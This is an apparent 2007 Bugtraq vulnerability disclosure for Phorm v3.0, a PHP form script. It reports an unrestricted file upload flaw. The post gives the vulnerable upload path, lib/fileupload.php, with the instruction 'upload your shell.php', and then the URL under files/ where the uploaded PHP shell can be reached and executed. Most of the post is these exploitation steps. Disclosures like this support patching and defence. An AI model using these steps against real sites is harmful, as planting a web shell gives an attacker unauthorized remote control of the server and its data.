
Date: 30 Jul 2007 19:12:06 -0000
From: ilkerkandemir@...et.com
To: bugtraq@...urityfocus.com
Subject: Phorm v3.0 Remote File Upload Vulnerability

# # # # # # # # # # # # # # # # # # # # # # # # # 

# Phorm v3.0  Remote File Upload Vulnerability

# ilker kandemir <ilkerkandemir[at]mynet.com>

# Download: ftp://ftp.holotech.net/phorm/phorm.zip

# TnX.: Ajann, Dumenci, H0tTurk, Str0ke

# # # # # # # # # # # # # # # # # # # # # # # # # 

# Exploit: http://[site]/[phorm_path]/lib/fileupload.php           [+]=====>> upload your shell.php

# http://[site]/[phorm_path]/files/phpshell.php

# # # # # # # # # # # # # # # # # # # # # # # # # 
